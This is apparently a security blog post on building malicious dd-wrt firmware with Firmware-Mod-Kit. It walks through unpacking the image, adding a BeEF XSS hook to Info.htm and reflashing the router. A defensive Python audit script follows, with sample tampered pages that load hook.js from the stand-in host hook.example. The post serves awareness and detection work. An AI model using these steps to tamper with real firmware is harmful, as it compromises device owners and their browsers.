Creating Malicious Firmware with Firmware-Mod-Kit

The intent of this tech segment is to show how insecure these devices are, and how cautious we need to be when rooting, modifying or updating firmware. It starts with a tool created by Craig Heffner and Jeremy Collake (download here). It lets you take a firmware image and strip it down to its root file system; Craig uses it, along with binwalk, extensively on his embedded-device hacking blog, devttys0. The collection of scripts is easy to use, and it saves an enormous amount of time: doing any of this manually would take hours, if not days. Let's dive right in.

First, we need to extract the firmware we have. I am using a router running dd-wrt, so I figured that would be a good firmware to grab and rip apart. We run ./extract-firmware.sh filename. This decompresses the firmware and lays it out neatly in a “fmk/” directory.

Next we extract the dd-wrt GUI (the web pages) by running ./ddwrt-gui-extract.sh:

We then find our target page, Info.htm, open it and add our BeEF XSS hook:

We package it all back up with ./ddwrt-gui-rebuild and ./build-firmware. When it's done, we flash the router with the new firmware. When we come back to the page, our browser is hooked and exploited.
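As an added example (not from the original post and not part of Firmware-Mod-Kit), here is the defender-side check for the scenario above: once a known-good image and a suspect image have each been unpacked with ./extract-firmware.sh, this hypothetical Python helper hashes every file in the two rootfs trees, lists what changed, and flags any HTML page that gained a remote <script src> reference, which is exactly the kind of change an injected hook page carries. The sample trees, file names and the hook.example host are constructed test data.

```python
import hashlib
import re
from pathlib import Path

# Matches <script ... src="http://...">, "https://..." or protocol-relative "//..."
_REMOTE_SCRIPT = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']?\s*((?:https?:)?//[^"\'\s>]+)', re.IGNORECASE)

def load_tree(root):
    """Read every regular file under root (e.g. fmk/rootfs) into {relpath: bytes}."""
    root = Path(root)
    return {str(p.relative_to(root)): p.read_bytes() for p in root.rglob("*") if p.is_file()}

def manifest(tree):
    """Map each relative path to the SHA-256 of its contents."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in tree.items()}

def remote_scripts(data):
    """Remote script URLs referenced from an HTML file (decoded leniently)."""
    return _REMOTE_SCRIPT.findall(data.decode("utf-8", errors="replace"))

def audit(known_good, suspect):
    """Diff two trees; list added/removed/modified files and any remote
    <script src> that a new or changed HTML page did not have before."""
    good, bad = manifest(known_good), manifest(suspect)
    added = sorted(set(bad) - set(good))
    removed = sorted(set(good) - set(bad))
    modified = sorted(p for p in good if p in bad and good[p] != bad[p])
    injected = {}
    for path in added + modified:
        if path.lower().endswith((".htm", ".html", ".asp")):
            before = set(remote_scripts(known_good.get(path, b"")))
            new = [u for u in remote_scripts(suspect[path]) if u not in before]
            if new:
                injected[path] = new
    return {"added": added, "removed": removed, "modified": modified,
            "injected_scripts": injected}

# Constructed sample trees standing in for two extracted rootfs directories.
CLEAN = {
    "www/Info.htm": b'<html><head><script src="common.js"></script></head><body>Info</body></html>',
    "www/style.css": b"body { color: black; }",
}
TAMPERED = dict(CLEAN)
TAMPERED["www/Info.htm"] = CLEAN["www/Info.htm"].replace(
    b"</head>", b'<script src="http://hook.example/hook.js"></script></head>')
TAMPERED["www/extra.htm"] = b"<script src='//hook.example/x.js'></script>"
```

Against real images, call `audit(load_tree("clean/fmk/rootfs"), load_tree("suspect/fmk/rootfs"))` and treat any entry under `injected_scripts`, or any modified file outside the paths you expect an update to touch, as a reason not to flash.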

Paul Asadoorian

Paul Asadoorian is currently the Principal Security Evangelist for Eclypsium, focused on firmware and supply chain security awareness. Paul's passion for firmware security extends back many years to the WRT54G hacking days and reverse engineering firmware on IoT devices for fun. Paul and his long-time podcast co-host Larry Pesce co-authored the book “WRT54G Ultimate Hacking” in 2007, which fueled the firmware hacking fire even more. Paul has worked in technology and information security for over 20 years, holding various security and engineering roles at a lottery company, a university, an ISP, as an independent penetration tester, and at security product companies such as Tenable. In 2005 Paul founded Security Weekly, a weekly podcast dedicated to hacking and information security. In 2020 Security Weekly was acquired by the Cyberrisk Alliance. Paul is still the host of one of the longest-running security podcasts, Paul's Security Weekly; he enjoys coding in Python and telling everyone he uses Linux.